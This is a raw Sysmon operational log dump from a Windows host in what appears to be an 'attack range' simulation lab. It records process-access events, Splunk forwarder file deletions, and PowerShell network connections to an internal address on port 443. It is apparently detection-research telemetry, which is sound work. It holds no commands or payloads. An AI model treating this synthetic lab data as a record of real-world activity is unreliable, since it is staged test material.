21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.059{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E4DA0E845CE99A93C99D84C67B76172,SHA256=4EB4C00A944CDD22F5E4D1B1779AECF7B8D99F1AD0B3AF44153FFBEA41781D7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:01.626{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=87EA2AEBE1E9278E018840A77CD2216C,SHA256=3A140AFE5496DDF7CE1F2A24986E7DB1D2A84FF17D6D92F7D5A20FB707C50AD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:01.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A42B43639228449A3942CEC344453647,SHA256=DB62AEC02DA41C33D61AAFCF49D742C738335DA4752E351BA5B6A7237F57E749,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:02.422{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F753BBF63C61C4EA784524EE7277417B,SHA256=180DAA5A755F651D555A441E12045E1F7EB742E3852466E84B155FDA0508CB5C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.099{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61986-false10.0.1.12-8089- 23542300x800000000000000035127148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:03.458{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C9E18638D39B81991BA9AC1FC2D2E95,SHA256=E4CB98EF18EA3CCE9B0729A09999716B032D5297E1328C750E37A8A2431D6496,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:27.320{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61988-false10.0.1.12-8000- 354300x800000000000000035127146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:26.783{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61987-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:04.473{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA445ABEC2B09FE08819D6B86791BD6F,SHA256=AAB117A8B60E3F9FA362EE13E3D7A071BD8BCD3466B332CB03DA6DDC93986B51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:05.722{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=15EFD385CFF957F3E6409EA5AD26A946,SHA256=5B89DE636244D54666920F1A417E0E9938FB8797F3F902764001D09F908FF99A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:05.488{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4348B575F3B284F5A96DD65E24DBC15,SHA256=52597E1BC98BF8466D6B49DF50108A8BEF55A345AF62EF0AFEC4F09CA3E7440A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:06.503{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BF62823618F9985521DE85ADDD3EEE6,SHA256=DF9390DEA64ED7D591503BC57AF337E227139B5219DEAB4079AA2AFA2002F144,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:07.519{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C6A190B049B5E9E88BB669BD7E1A9AA,SHA256=83E1F56BBBF0228CEEF921A5CEA6C4C0028522979D6F416210C78999B9827DDF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:30.797{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61989-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:08.537{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37939148C11DE9F395758319138CBB2B,SHA256=0972435365892FCEC4C84EA310977394278BF0A59CD91DE2803E6E34E458FDE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:09.818{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B6B885EFEFD296A4B107F53F2CD6D0BF,SHA256=8F9F21298292856FAC6F66651050943E15C3D6A93DB8D8D0F66DFD32E831044E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:09.568{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92CCECD9E7FAFF125FF671EB5F50AF61,SHA256=A37453E6EB511F69802322DDE80D2EB93F48D9D91A56199090783A07CE5F18FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:33.247{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61990-false10.0.1.12-8000- 10341000x800000000000000035127177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.983{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-820A-613A-A296-03000000C801}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.983{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 